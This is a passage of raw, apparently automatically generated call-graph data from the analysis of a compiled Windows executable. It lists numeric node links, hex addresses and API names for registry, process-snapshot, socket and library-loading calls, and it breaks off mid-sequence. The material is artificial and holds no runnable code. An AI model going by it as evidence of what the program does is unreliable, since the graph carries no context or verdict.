83635->83598 83636->83598 83637->83588 83639 408f48 ctype 83638->83639 83640 4265c7 VariantClear 83639->83640 83641 408f55 ctype 83639->83641 83640->83641 83641->83589 83642->83617 83643->83619 83644->83628 83645->83627 83646->83634 83647 425ba2 83652 40e360 83647->83652 83649 425bb4 83668 41130a 51 API calls __cinit 83649->83668 83651 425bbe 83653 4115d7 52 API calls 83652->83653 83654 40e3ec GetModuleFileNameW 83653->83654 83669 413a0e 83654->83669 83656 40e421 _wcsncat 83672 413a9e 83656->83672 83659 4115d7 52 API calls 83660 40e45e _wcscpy 83659->83660 83661 40bc70 52 API calls 83660->83661 83662 40e498 83661->83662 83675 40e4c0 83662->83675 83664 40e4a9 83664->83649 83665 401c90 52 API calls 83666 40e4a1 _wcscat _wcslen _wcsncpy 83665->83666 83666->83664 83666->83665 83667 4115d7 52 API calls 83666->83667 83667->83666 83668->83651 83689 413801 83669->83689 83719 419efd 83672->83719 83731 403350 83675->83731 83677 40e4cb RegOpenKeyExW 83678 427190 RegQueryValueExW 83677->83678 83679 40e4eb 83677->83679 83680 4271b0 83678->83680 83681 42721a RegCloseKey 83678->83681 83679->83666 83682 4115d7 52 API calls 83680->83682 83681->83666 83683 4271cb 83682->83683 83738 43652f 52 API calls 83683->83738 83685 4271d8 RegQueryValueExW 83686 42720e 83685->83686 83687 4271f7 83685->83687 83686->83681 83688 402160 52 API calls 83687->83688 83688->83686 83691 41389e 83689->83691 83696 41381a 83689->83696 83690 4139e8 83716 417f77 46 API calls __getptd_noexit 83690->83716 83691->83690 83693 413a00 83691->83693 83718 417f77 46 API calls __getptd_noexit 83693->83718 83694 4139ed 83717 417f25 10 API calls strtoxl 83694->83717 83696->83691 83699 41388a 83696->83699 83711 419e30 46 API calls 2 library calls 83696->83711 83698 413967 83698->83656 83699->83691 83710 413909 83699->83710 83712 419e30 46 API calls 2 library calls 83699->83712 83701 41396c 83701->83691 83701->83698 83704 41397a 83701->83704 83702 413929 83702->83691 83703 413945 83702->83703 83713 419e30 46 API calls 2 library calls 83702->83713 83703->83691 83703->83698 83707 41395b 83703->83707 83715 419e30 46 API calls 2 library calls 83704->83715 83714 419e30 46 API calls 2 library calls 83707->83714 83710->83701 83710->83702 83711->83699 83712->83710 83713->83703 83714->83698 83715->83698 83716->83694 83717->83698 83718->83698 83720 419f13 83719->83720 83721 419f0e 83719->83721 83728 417f77 46 API calls __getptd_noexit 83720->83728 83721->83720 83724 419f2b 83721->83724 83723 419f18 83729 417f25 10 API calls strtoxl 83723->83729 83727 40e454 83724->83727 83730 417f77 46 API calls __getptd_noexit 83724->83730 83727->83659 83728->83723 83729->83727 83730->83723 83732 403367 83731->83732 83733 403358 83731->83733 83734 4115d7 52 API calls 83732->83734 83733->83677 83735 403370 83734->83735 83736 4115d7 52 API calls 83735->83736 83737 40339e 83736->83737 83737->83677 83738->83685 83739 42b14b 83746 40bc10 83739->83746 83741 42b159 83757 4096a0 83741->83757 83743 42b177 83884 44b92d VariantClear 83743->83884 83745 42bc5b 83747 40bc24 83746->83747 83748 40bc17 83746->83748 83750 40bc2a 83747->83750 83751 40bc3c 83747->83751 83885 408e80 VariantClear 83748->83885 83886 408e80 VariantClear 83750->83886 83754 4115d7 52 API calls 83751->83754 83752 40bc1f 83752->83741 83756 40bc43 83754->83756 83755 40bc33 83755->83741 83756->83741 83758 4096c6 _wcslen 83757->83758 83759 4115d7 52 API calls 83758->83759 83820 40a70c ctype _memmove 83758->83820 83760 4096fa _memmove 83759->83760 83762 4115d7 52 API calls 83760->83762 83764 40971b 83762->83764 83763 4297aa 83765 4115d7 52 API calls 83763->83765 83766 409749 CharUpperBuffW 83764->83766 83768 40976a ctype 83764->83768 83764->83820 83808 4297d1 _memmove 83765->83808 83766->83768 83816 4097e5 ctype 83768->83816 83996 47dcbb 465 API calls 83768->83996 83770 408f40 VariantClear 83771 42ae92 83770->83771 84048 410c60 VariantClear ctype 83771->84048 83773 42aea4 83774 409aa2 83776 4115d7 52 API calls 83774->83776 83780 409afe 83774->83780 83774->83808 83775 40a689 83777 4115d7 52 API calls 83775->83777 83776->83780 83793 40a6af ctype _memmove 83777->83793 83779 409b2a 83783 429dbe 83779->83783 83844 409b4d ctype _memmove 83779->83844 84027 40b400 VariantClear VariantClear ctype 83779->84027 83780->83779 83781 4115d7 52 API calls 83780->83781 83782 429d31 83781->83782 83785 429d42 83782->83785 84024 44a801 52 API calls 83782->84024 83787 429dd3 83783->83787 84028 40b400 VariantClear VariantClear ctype 83783->84028 83784 409fd2 83790 40a045 83784->83790 83846 42a3f5 83784->83846 83798 40e0a0 52 API calls 83785->83798 83787->83844 84029 40e1c0 VariantClear ctype 83787->84029 83788 429a46 VariantClear 83788->83816 83795 4115d7 52 API calls 83790->83795 83791 408f40 VariantClear 83791->83816 83800 4115d7 52 API calls 83793->83800 83801 40a04c 83795->83801 83797 4115d7 52 API calls 83797->83816 83802 429d57 83798->83802 83800->83820 83806 40a0a7 83801->83806 83887 4091e0 83801->83887 84025 453443 52 API calls 83802->84025 83804 42a42f 84034 45e737 90 API calls 3 library calls 83804->84034 83829 40a0af 83806->83829 84035 40c790 VariantClear ctype 83806->84035 83807 4299d9 83811 408f40 VariantClear 83807->83811 84047 45e737 90 API calls 3 library calls 83808->84047 83815 4299e2 83811->83815 83812 429abd 83812->83743 83813 429d88 84026 453443 52 API calls 83813->84026 84016 410c60 VariantClear ctype 83815->84016 83816->83774 83816->83775 83816->83788 83816->83791 83816->83793 83816->83797 83816->83807 83816->83808 83816->83812 83824 42a452 83816->83824 83953 40a780 83816->83953 83997 40c2c0 83816->83997 84015 40c4e0 465 API calls 83816->84015 84017 40ba10 83816->84017 84023 40e270 VariantClear ctype 83816->84023 83995 4013a0 52 API calls 83820->83995 83823 402780 52 API calls 83823->83844 83824->83770 83825 44a801 52 API calls 83825->83844 83827 408f40 VariantClear 83857 40a162 ctype _memmove 83827->83857 83828 41130a 51 API calls __cinit 83828->83844 83830 40a11b 83829->83830 83831 42a4b4 VariantClear 83829->83831 83829->83857 83837 40a12d ctype 83830->83837 84036 40e270 VariantClear ctype 83830->84036 83831->83837 83832 40a780 451 API calls 83832->83844 83835 401980 53 API calls 83835->83844 83836 4115d7 52 API calls 83836->83857 83837->83836 83837->83857 83840 42a74d VariantClear 83840->83857 83841 4115d7 52 API calls 83841->83844 83842 40a368 83845 42aad4 83842->83845 83852 40a397 83842->83852 83843 40e270 VariantClear 83843->83857 83844->83784 83844->83804 83844->83820 83844->83823 83844->83825 83844->83828 83844->83832 83844->83835 83844->83841 83844->83846 83850 409c95 83844->83850 84030 45f508 52 API calls 83844->84030 84031 403e10 53 API calls 83844->84031 84032 408e80 VariantClear 83844->84032 84040 46fe90 VariantClear VariantClear ctype 83845->84040 84033 47390f VariantClear 83846->84033 83847 42a7e4 VariantClear 83847->83857 83848 42a886 VariantClear 83848->83857 83850->83743 83851 40a3ce 83864 40a3d9 ctype 83851->83864 84041 40b400 VariantClear VariantClear ctype 83851->84041 83852->83851 83877 40a42c ctype 83852->83877 83994 40b400 VariantClear VariantClear ctype 83852->83994 83855 42abaf 83860 42abd4 VariantClear 83855->83860 83871 40a4ee ctype 83855->83871 83856 4115d7 52 API calls 83856->83857 83857->83827 83857->83840 83857->83842 83857->83843 83857->83845 83857->83847 83857->83848 83857->83856 83859 4115d7 52 API calls 83857->83859 84037 470870 52 API calls 83857->84037 84038 408e80 VariantClear 83857->84038 84039 44ccf1 VariantClear ctype 83857->84039 83858 40a4dc 83858->83871 84043 40e270 VariantClear ctype 83858->84043 83861 42a5a6 VariantInit VariantCopy 83859->83861 83860->83871 83861->83857 83866 42a5c6 VariantClear 83861->83866 83862 42ac4f 83870 42ac79 VariantClear 83862->83870 83875 40a546 ctype 83862->83875 83865 40a41a 83864->83865 83868 42ab44 VariantClear 83864->83868 83864->83877 83865->83877 84042 40e270 VariantClear ctype 83865->84042 83866->83857 83867 40a534 83867->83875 84044 40e270 VariantClear ctype 83867->84044 83868->83877 83870->83875 83871->83862 83871->83867 83872 42ad28 83878 42ad4e VariantClear 83872->83878 83883 40a583 ctype 83872->83883 83875->83872 83876 40a571 83875->83876 83876->83883 84045 40e270 VariantClear ctype 83876->84045 83877->83855 83877->83858 83878->83883 83880 40a650 ctype 83880->83743 83881 42ae0e VariantClear 83881->83883 83883->83880 83883->83881 84046 40e270 VariantClear ctype 83883->84046 83884->83745 83885->83752 83886->83755 83888 409202 83887->83888 83889 42d7ad 83887->83889 83946 409216 ctype 83888->83946 84193 410940 465 API calls 83888->84193 84196 45e737 90 API calls 3 library calls 83889->84196 83892 409386 83893 40939c 83892->83893 84194 40f190 10 API calls 83892->84194 83893->83806 83895 4095b2 83895->83893 83897 4095bf 83895->83897 83896 409253 PeekMessageW 83896->83946 84195 401a50 465 API calls 83897->84195 83899 42d8cd Sleep 83899->83946 83900 4095c6 LockWindowUpdate DestroyWindow GetMessageW 83900->83893 83903 4095f9 83900->83903 83902 42e13b 84221 40d410 VariantClear 83902->84221 83906 42e158 TranslateMessage DispatchMessageW GetMessageW 83903->83906 83906->83906 83907 42e188 83906->83907 83907->83893 83909 409567 PeekMessageW 83909->83946 83911 44c29d 52 API calls 83952 42da45 83911->83952 83912 46f3c1 107 API calls 83912->83946 83913 40e0a0 52 API calls 83913->83946 83914 46fdbf 108 API calls 83914->83952 83915 42dcd2 WaitForSingleObject 83919 42dcf0 GetExitCodeProcess CloseHandle 83915->83919 83915->83946 83916 409551 TranslateMessage DispatchMessageW 83916->83909 83918 42dd3d Sleep 83918->83952 84202 40d410 VariantClear 83919->84202 83921 4094cf Sleep 83921->83946 83924 40d410 VariantClear 83924->83946 83925 408f40 VariantClear 83925->83952 83927 42d94d timeGetTime 84198 465124 53 API calls 83927->84198 83929 40c620 timeGetTime 83929->83946 83932 465124 53 API calls 83932->83952 83933 42dd89 CloseHandle 83933->83952 83934 47d33e 443 API calls 83934->83946 83936 42de19 GetExitCodeProcess CloseHandle 83936->83952 83938 401b10 52 API calls 83938->83952 83940 42de88 Sleep 83940->83946 83942 4096a0 443 API calls 83942->83946 83945 45e737 90 API calls 83945->83946 83946->83892 83946->83896 83946->83899 83946->83902 83946->83909 83946->83912 83946->83913 83946->83915 83946->83916 83946->83918 83946->83921 83946->83924 83946->83927 83946->83929 83946->83934 83946->83942 83946->83945 83947 42e0cc VariantClear 83946->83947 83948 408f40 VariantClear 83946->83948 83946->83952 84049 4091b0 83946->84049 84107 40afa0 83946->84107 84133 408fc0 83946->84133 84168 408cc0 83946->84168 84182 40d150 83946->84182 84187 40d170 83946->84187 84197 465124 53 API calls 83946->84197 84220 40e270 VariantClear ctype 83946->84220 83947->83946 83948->83946 83950 401980 53 API calls 83950->83952 83952->83911 83952->83914 83952->83925 83952->83932 83952->83933 83952->83936 83952->83938 83952->83940 83952->83946 83952->83950 84199 45178a 54 API calls 83952->84199 84200 47d33e 465 API calls 83952->84200 84201 453bc6 54 API calls 83952->84201 84203 40c620 timeGetTime 83952->84203 84204 40d410 VariantClear 83952->84204 84205 443d19 83952->84205 84213 4574b4 VariantClear 83952->84213 84214 403cd0 83952->84214 84218 4731e1 VariantClear 83952->84218 84219 4331a2 6 API calls 83952->84219 83954 40a7a6 83953->83954 83955 40ae8c 83953->83955 83957 4115d7 52 API calls 83954->83957 85906 41130a 51 API calls __cinit 83955->85906 83991 40a7c6 ctype _memmove 83957->83991 83958 40a86d 83959 40abd1 83958->83959 83975 40a878 ctype 83958->83975 85911 45e737 90 API calls 3 library calls 83959->85911 83960 401b10 52 API calls 83960->83991 83962 40bc10 53 API calls 83962->83991 83963 408e80 VariantClear 83963->83991 83964 42b791 VariantClear 83964->83991 83965 42ba2d VariantClear 83965->83991 83966 408f40 VariantClear 83966->83975 83967 42b459 VariantClear 83967->83991 83968 40a884 ctype 83968->83816 83969 408cc0 458 API calls 83969->83991 83970 42b6f6 VariantClear 83970->83991 83971 4115d7 52 API calls 83971->83991 83973 42bc5b 83973->83816 83974 42bb6a 85914 44b92d VariantClear 83974->85914 83975->83966 83975->83968 83976 40e270 VariantClear 83976->83991 83977 42bbf5 85912 45e737 90 API calls 3 library calls 83977->85912 83979 4115d7 52 API calls 83983 42b5b3 VariantInit VariantCopy 83979->83983 83980 40b5f0 89 API calls 83980->83991 83982 408f40 VariantClear 83982->83991 83985 42b5d7 VariantClear 83983->83985 83983->83991 83985->83991 83987 42bc37 85913 45e737 90 API calls 3 library calls 83987->85913 83990 42bc48 83990->83974 83992 408f40 VariantClear 83990->83992 83991->83958 83991->83959 83991->83960 83991->83962 83991->83963 83991->83964 83991->83965 83991->83967 83991->83969 83991->83970 83991->83971 83991->83974 83991->83976 83991->83977 83991->83979 83991->83980 83991->83982 83991->83987 83993 4530c9 VariantClear 83991->83993 85907 45308a 53 API calls 83991->85907 85908 470870 52 API calls 83991->85908 85909 457f66 87 API calls __write_nolock 83991->85909 85910 472f47 127 API calls 83991->85910 83992->83974 83993->83991 83994->83851 83995->83763 83996->83768 83998 40c2c7 83997->83998 83999 40c30e 83997->83999 84000 40c2d3 83998->84000 84001 426c79 83998->84001 84002 40c315 83999->84002 84003 426c2b 83999->84003 85915 403ea0 52 API calls __cinit 84000->85915 85920 4534e3 52 API calls 84001->85920 84007 40c321 84002->84007 84012 426c5a 84002->84012 84005 426c4b 84003->84005 84006 426c2e 84003->84006 85918 4534e3 52 API calls 84005->85918 84014 40c2de 84006->84014 85917 4534e3 52 API calls 84006->85917 85916 403ea0 52 API calls __cinit 84007->85916 85919 4534e3 52 API calls 84012->85919 84014->83816 84015->83816 84016->83880 84018 40ba49 84017->84018 84021 40ba1b ctype _memmove 84017->84021 84020 4115d7 52 API calls 84018->84020 84019 4115d7 52 API calls 84022 40ba22 84019->84022 84020->84021 84021->84019 84022->83816 84023->83816 84024->83785 84025->83813 84026->83779 84027->83783 84028->83787 84029->83844 84030->83844 84031->83844 84032->83844 84033->83804 84034->83824 84035->83806 84036->83837 84037->83857 84038->83857 84039->83857 84040->83851 84041->83864 84042->83877 84043->83871 84044->83875 84045->83883 84046->83883 84047->83824 84048->83773 84050 42c5fe 84049->84050 84065 4091c6 84049->84065 84051 40bc70 52 API calls 84050->84051 84050->84065 84052 42c64e InterlockedIncrement 84051->84052 84053 42c665 84052->84053 84058 42c697 84052->84058 84055 42c672 InterlockedDecrement Sleep InterlockedIncrement 84053->84055 84053->84058 84054 42c737 InterlockedDecrement 84056 42c74a 84054->84056 84055->84053 84055->84058 84059 408f40 VariantClear 84056->84059 84057 42c731 84057->84054 84058->84054 84058->84057 84222 408e80 VariantClear 84058->84222 84061 42c752 84059->84061 84236 410c60 VariantClear ctype 84061->84236 84062 42c6cf 84223 45340c 84062->84223 84065->83946 84066 42c6db 84067 402160 52 API calls 84066->84067 84068 42c6e5 84067->84068 84069 45340c 85 API calls 84068->84069 84070 42c6f1 84069->84070 84229 40d200 52 API calls 2 library calls 84070->84229 84072 42c6fb 84230 465124 53 API calls 84072->84230 84074 42c715 84075 42c76a 84074->84075 84076 42c719 84074->84076 84237 401b10 84075->84237 84231 46fe32 84076->84231 84079 42c77e 84080 401980 53 API calls 84079->84080 84085 42c796 84080->84085 84081 42c812 84082 46fe32 VariantClear 84081->84082 84083 42c82a InterlockedDecrement 84082->84083 84243 46ff07 54 API calls 84083->84243 84085->84081 84086 42c864 84085->84086 84087 40ba10 52 API calls 84085->84087 84244 45e737 90 API calls 3 library calls 84086->84244 84087->84085 84088 42c9ec 84246 47d33e 465 API calls 84088->84246 84091 42c9fe 84247 46feb1 VariantClear VariantClear 84091->84247 84093 408f40 VariantClear 84103 42c849 84093->84103 84094 42ca08 84097 401b10 52 API calls 84094->84097 84095 408f40 VariantClear 84099 42c891 84095->84099 84096 402780 52 API calls 84096->84103 84098 42ca15 84097->84098 84100 40c2c0 52 API calls 84098->84100 84245 410c60 VariantClear ctype 84099->84245 84104 42c874 84100->84104 84102 401980 53 API calls 84102->84103 84103->84088 84103->84093 84103->84096 84103->84102 84105 40a780 459 API calls 84103->84105 84104->84095 84106 42ca59 84104->84106 84105->84103 84106->84106 84108 40afc4 84107->84108 84109 40b156 84107->84109 84110 40afd5 84108->84110 84111 42d1e3 84108->84111 84250 45e737 90 API calls 3 library calls 84109->84250 84115 40a780 463 API calls 84110->84115 84129 40b11a ctype 84110->84129 84251 45e737 90 API calls 3 library calls 84111->84251 84114 42d1f8 84120 408f40 VariantClear 84114->84120 84117 40b00a 84115->84117 84116 40b143 84116->83946 84117->84114 84121 40b012 84117->84121 84119 42d4db 84119->84119 84120->84116 84122 40b04a 84121->84122 84123 42d231 VariantClear 84121->84123 84131 40b094 ctype 84121->84131 84130 40b05c ctype 84122->84130 84252 40e270 VariantClear ctype 84122->84252 84123->84130 84124 40b108 84124->84129 84253 40e270 VariantClear ctype 84124->84253 84125 42d45a VariantClear 84125->84129 84128 4115d7 52 API calls 84128->84131 84129->84116 84254 45e737 90 API calls 3 library calls 84129->84254 84130->84128 84130->84131 84131->84124 84132 42d425 ctype 84131->84132 84132->84125 84132->84129 84134 408fff 84133->84134 84138 40900d 84133->84138 84255 403ea0 52 API calls __cinit 84134->84255 84137 42c3f6 84259 45e737 90 API calls 3 library calls 84137->84259 84138->84137 84140 42c44a 84138->84140 84141 40a780 465 API calls 84138->84141 84144 42c47b 84138->84144 84145 42c4cb 84138->84145 84146 42c564 84138->84146 84150 42c548 84138->84150 84153 409112 84138->84153 84155 42c528 84138->84155 84157 4090df 84138->84157 84158 4090ea 84138->84158 84167 4090f2 ctype 84138->84167 84258 4534e3 52 API calls 84138->84258 84260 40c4e0 465 API calls 84138->84260 84261 45e737 90 API calls 3 library calls 84140->84261 84141->84138 84262 451b42 61 API calls 84144->84262 84264 47faae 465 API calls 84145->84264 84151 408f40 VariantClear 84146->84151 84148 42c491 84148->84167 84263 45e737 90 API calls 3 library calls 84148->84263 84267 45e737 90 API calls 3 library calls 84150->84267 84151->84167 84152 42c4da 84152->84167 84265 45e737 90 API calls 3 library calls 84152->84265 84153->84150 84160 40912b 84153->84160 84266 45e737 90 API calls 3 library calls 84155->84266 84157->84158 84256 408e80 VariantClear 84157->84256 84163 408f40 VariantClear 84158->84163 84160->84167 84257 403e10 53 API calls 84160->84257 84163->84167 84165 40914b 84166 408f40 VariantClear 84165->84166 84166->84167 84167->83946 84268 408d90 84168->84268 84170 408cf9 84171 429778 84170->84171 84174 42976c 84170->84174 84176 408d2d 84170->84176 84309 410c60 VariantClear ctype 84171->84309 84173 429780 84308 45e737 90 API calls 3 library calls 84174->84308 84284 403d10 84176->84284 84179 408d71 ctype 84179->83946 84180 408f40 VariantClear 84181 408d45 ctype 84180->84181 84181->84179 84181->84180 84184 425c87 84182->84184 84186 40d15f 84182->84186 84183 425cc7 84184->84183 84185 425ca1 TranslateAcceleratorW 84184->84185 84185->84186 84186->83946 84188 42602f 84187->84188 84192 40d17f 84187->84192 84188->83946 84189 40d18c 84189->83946 84190 42608e IsDialogMessageW 84190->84189 84190->84192 84192->84189 84192->84190 85855 430c46 GetClassLongW 84192->85855 84193->83946 84194->83895 84195->83900 84196->83946 84197->83946 84198->83946 84199->83952 84200->83952 84201->83952 84202->83952 84203->83952 84204->83952 84206 443d51 84205->84206 84207 443d33 _wcslen 84205->84207 85857 433ee0 CreateToolhelp32Snapshot Process32FirstW 84206->85857 84207->84206 84210 443d41 84207->84210 84209 443d59 84209->83952 85856 433d9e 63 API calls 4 library calls 84210->85856 84212 443d49 84212->83952 84213->83952 84215 403cdf 84214->84215 84216 408f40 VariantClear 84215->84216 84217 403ce7 84216->84217 84217->83940 84218->83952 84219->83952 84220->83946 84221->83892 84222->84062 84224 453439 84223->84224 84225 453419 84223->84225 84224->84066 84226 45342f 84225->84226 84248 4531b1 85 API calls 5 library calls 84225->84248 84226->84066 84228 453425 84228->84066 84229->84072 84230->84074 84232 46fe66 84231->84232 84233 46fe41 84231->84233 84232->84057 84235 46fe59 84233->84235 84249 40e1c0 VariantClear ctype 84233->84249 84235->84057 84236->84065 84238 401b16 _wcslen 84237->84238 84239 4115d7 52 API calls 84238->84239 84242 401b63 84238->84242 84240 401b4b _memmove 84239->84240 84241 4115d7 52 API calls 84240->84241 84241->84242 84242->84079 84243->84103 84244->84104 84245->84065 84246->84091 84247->84094 84248->84228 84249->84233 84250->84111 84251->84114 84252->84130 84253->84129 84254->84119 84255->84138 84256->84158 84257->84165 84258->84138 84259->84167 84260->84138 84261->84167 84262->84148 84263->84167 84264->84152 84265->84167 84266->84167 84267->84146 84269 4289d2 84268->84269 84270 408db3 84268->84270 84314 45e737 90 API calls 3 library calls 84269->84314 84310 40bec0 84270->84310 84273 4289e5 84315 45e737 90 API calls 3 library calls 84273->84315 84274 408e5a 84274->84170 84276 40ba10 52 API calls 84282 408dc9 84276->84282 84277 428a05 84278 408f40 VariantClear 84277->84278 84278->84274 84279 40a780 465 API calls 84279->84282 84280 408e64 84281 408f40 VariantClear 84280->84281 84281->84274 84282->84273 84282->84274 84282->84276 84282->84277 84282->84279 84282->84280 84283 408f40 VariantClear 84282->84283 84283->84282 84285 408f40 VariantClear 84284->84285 84286 403d20 84285->84286 84287 403cd0 VariantClear 84286->84287 84288 403d4d 84287->84288 84317 47ac6d 84288->84317 84332 457e3f 84288->84332 84343 477638 84288->84343 84367 46cef3 84288->84367 84409 46d230 84288->84409 84433 40d3b0 84288->84433 84440 46beb2 84288->84440 84513 4653c8 84288->84513 84531 457655 84288->84531 84538 457e22 84288->84538 84541 4755c4 84288->84541 84563 4589ac WSAStartup 84288->84563 84567 45774c 84288->84567 84578 46d402 84288->84578 84597 46e1a6 84288->84597 84645 46d1a6 84288->84645 84655 46f5e2 84288->84655 84691 4755ad 84288->84691 84289 403d76 84289->84171 84289->84181 84308->84171 84309->84173 84311 40bed0 84310->84311 84312 40bef2 84311->84312 84316 45e737 90 API calls 3 library calls 84311->84316 84312->84282 84314->84273 84315->84277 84316->84312 84694 471f53 84317->84694 84319 47ac84 84705 46f3c1 84319->84705 84321 47ac8c 84322 47acc2 84321->84322 84323 47ac90 84321->84323 84324 40bc70 52 API calls 84322->84324 84325 408f40 VariantClear 84323->84325 84326 47accb 84324->84326 84327 47acab 84325->84327 84721 461383 84326->84721 84327->84289 84329 47acdc 84736 40e6a0 53 API calls 84329->84736 84331 47ace8 84331->84289 84333 45340c 85 API calls 84332->84333 84334 457e61 84333->84334 84335 443d19 67 API calls 84334->84335 84336 457e67 84335->84336 84337 457e71 84336->84337 84338 457e9d 84336->84338 84339 408f40 VariantClear 84337->84339 84340 408f40 VariantClear 84338->84340 84341 457e76 84339->84341 84342 457ea2 84340->84342 84341->84289 84342->84289 84344 477652 84343->84344 84345 45340c 85 API calls 84344->84345 84346 477685 84345->84346 84815 44ad65 84346->84815 84368 45340c 85 API calls 84367->84368 84369 46cf16 84368->84369 84370 40bc70 52 API calls 84369->84370 84371 46cf23 84370->84371 84372 40bc70 52 API calls 84371->84372 84373 46cf41 84372->84373 84820 40e710 84373->84820 84376 46cf70 _wcslen 84378 46cf85 84376->84378 84379 46d0f2 84376->84379 84377 46cf61 OleInitialize 84377->84376 84831 4339fa 84378->84831 84381 46d119 GetActiveObject 84379->84381 84382 45340c 85 API calls 84379->84382 84386 46d029 84381->84386 84389 46d133 84381->84389 84385 46d10a CLSIDFromProgID 84382->84385 84384 46d018 CreateBindCtx 84384->84386 84388 46d055 MkParseDisplayName 84384->84388 84385->84381 84385->84386 84838 451b42 61 API calls 84386->84838 84387 402160 52 API calls 84407 46cf9f 84387->84407 84391 46d06f 84388->84391 84392 46d0dc 84388->84392 84389->84386 84394 46d170 84389->84394 84397 46d0a7 84391->84397 84839 451b42 61 API calls 84391->84839 84841 451b42 61 API calls 84392->84841 84842 468070 104 API calls ctype 84394->84842 84396 46d036 84396->84289 84405 46d0c7 84397->84405 84840 468070 104 API calls ctype 84397->84840 84400 46cff8 84401 46d014 84400->84401 84837 40bd50 52 API calls 84400->84837 84401->84384 84405->84289 84407->84400 84408 40c600 52 API calls 84407->84408 84834 465177 52 API calls 84407->84834 84835 40bd50 52 API calls 84407->84835 84836 403020 52 API calls _memmove 84407->84836 84408->84407 84410 46d24b 84409->84410 84411 40e710 53 API calls 84410->84411 84412 46d268 84411->84412 84413 46d393 select 84412->84413 84418 46d271 84412->84418 84414 46d3e2 WSAGetLastError 84413->84414 84415 46d279 84413->84415 84414->84418 84416 4115d7 52 API calls 84415->84416 84417 46d283 __WSAFDIsSet 84416->84417 84419 46d29e #16 84417->84419 84420 46d342 ctype _memmove 84417->84420 84418->84289 84421 46d36a WSAGetLastError 84419->84421 84422 46d2b7 _strlen 84419->84422 84420->84289 84424 46d35f ctype 84421->84424 84423 46d2d7 84422->84423 84422->84424 84425 46d2f1 84422->84425 84851 453132 53 API calls setSBCS 84423->84851 84424->84289 84848 444e90 52 API calls 2 library calls 84425->84848 84428 46d2fb 84849 466715 54 API calls 84428->84849 84430 46d308 84850 40e6a0 53 API calls 84430->84850 84432 46d312 ctype 84432->84289 84434 40d3c4 84433->84434 84435 40d3cc timeGetTime 84434->84435 84436 42e19d Sleep 84434->84436 84437 40d3e2 84435->84437 84438 4091e0 463 API calls 84437->84438 84439 40d3fb 84438->84439 84439->84289 84441 40bc70 52 API calls 84440->84441 84442 46bed3 84441->84442 84443 40bc70 52 API calls 84442->84443 84444 46bedc 84443->84444 84445 40bc70 52 API calls 84444->84445 84446 46bee5 84445->84446 84447 40e710 53 API calls 84446->84447 84448 46bef2 84447->84448 84449 45340c 85 API calls 84448->84449 84450 46bf00 84449->84450 84451 401b10 52 API calls 84450->84451 84452 46bf0c 84451->84452 84852 463980 84452->84852 84514 4653e2 84513->84514 84515 4533eb 85 API calls 84514->84515 84516 4653e9 84515->84516 84908 465225 84516->84908 84518 4653f4 84519 465420 84518->84519 84520 4653f8 socket 84518->84520 84523 408f40 VariantClear 84519->84523 84521 46543f connect 84520->84521 84522 46540b WSAGetLastError 84520->84522 84524 465450 84521->84524 84525 46546b WSAGetLastError 84521->84525 84522->84519 84526 465428 84523->84526 84527 408f40 VariantClear 84524->84527 84914 403c90 84525->84914 84526->84289 84529 465458 84527->84529 84529->84289 84530 465480 closesocket 84530->84519 84534 457669 84531->84534 84532 4576c3 84533 408f40 VariantClear 84532->84533 84535 4576cb 84533->84535 84534->84532 84536 457684 VirtualFree 84534->84536 84535->84289 84537 4576a6 84536->84537 84537->84289 84917 457c53 84538->84917 84540 457e3a 84540->84289 84542 4755d1 __write_nolock 84541->84542 84543 40bc70 52 API calls 84542->84543 84544 4755e3 84543->84544 84545 4755fa CreateToolhelp32Snapshot Process32FirstW 84544->84545 84549 475624 _wcscat 84545->84549 84546 413a0e __wsplitpath 46 API calls 84546->84549 84547 45340c 85 API calls 84547->84549 84548 402160 52 API calls 84548->84549 84549->84546 84549->84547 84549->84548 84551 4756a3 Process32NextW 84549->84551 84952 4114ab 84549->84952 84551->84549 84552 4756b9 CloseHandle 84551->84552 84553 40e830 53 API calls 84552->84553 84554 4756d3 84553->84554 84960 40cf00 53 API calls 84554->84960 84556 4756e0 84557 408f40 VariantClear 84556->84557 84560 4756ea 84557->84560 84558 40cf00 53 API calls 84558->84560 84559 47577c 84559->84289 84560->84558 84560->84559 84561 40e710 53 API calls 84560->84561 84562 408f40 VariantClear 84560->84562 84561->84560 84562->84560 84564 4589dd 84563->84564 84964 4530c9 VariantClear 84564->84964 84566 4589f4 84566->84289 84568 45340c 85 API calls 84567->84568 84569 457760 LoadLibraryW 84568->84569 84570 45776e 84569->84570 84573 45778a 84569->84573 84571 408f40 VariantClear 84570->84571 84574 457776 84571->84574 84572 4577c2 84576 408f40 VariantClear 84572->84576 84573->84572 84965 436299 52 API calls 2 library calls 84573->84965 84574->84289 84577 4577d7 84576->84577 84577->84289 84966 40d370 84578->84966 84581 4533eb 85 API calls 84582 46d422 84581->84582 84971 45f645 WideCharToMultiByte 84582->84971 84584 46d429 gethostbyname 84585 46d437 WSAGetLastError 84584->84585 84586 46d469 _memmove 84584->84586 84588 46d44c 84585->84588 84587 46d47a inet_ntoa 84586->84587 84980 45213b 52 API calls 2 library calls 84587->84980 84590 40e710 53 API calls 84588->84590 84592 46d459 84590->84592 84591 46d491 84981 466715 54 API calls 84591->84981 84592->84289 84594 46d49e 84982 40e6a0 53 API calls 84594->84982 84596 46d4a8 84596->84289 84598 46e1c0 84597->84598 84599 4533eb 85 API calls 84598->84599 84601 46e1dc 84599->84601 84600 46e483 84600->84289 84601->84600 84602 46e2e7 84601->84602 84603 46e1e9 84601->84603 84985 40f760 84602->84985 84604 45340c 85 API calls 84603->84604 84611 46e1f4 _wcscpy _wcschr 84604->84611 84619 46e216 _wcscat _wcscpy 84611->84619 84623 46e248 _wcscat 84611->84623 84612 46e2c8 84615 408f40 VariantClear 84612->84615 84617 46e2d0 84615->84617 84616 45340c 85 API calls 84618 46e264 _wcscpy 84616->84618 84617->84289 85064 433998 GetFileAttributesW 84618->85064 84621 45340c 85 API calls 84619->84621 84621->84623 84622 46e27d _wcslen 84622->84612 84625 45340c 85 API calls 84622->84625 84623->84616 84626 46e2b0 84625->84626 85065 44bd27 80 API calls 4 library calls 84626->85065 84630 46e2bd 84630->84600 84630->84612 84646 46d1bd 84645->84646 85734 4680ed 84646->85734 84648 46d1cb 84649 46d1d9 send 84648->84649 84650 408f40 VariantClear 84649->84650 84651 46d1ee 84650->84651 84652 46d223 84651->84652 84653 46d1fa WSAGetLastError 84651->84653 84652->84289 84654 46d218 84653->84654 84654->84289 84656 4115d7 52 API calls 84655->84656 84657 46f5fe 84656->84657 84658 4533eb 85 API calls 84657->84658 84659 46f62f 84658->84659 85739 4536f7 84659->85739 84661 46f656 84662 4533eb 85 API calls 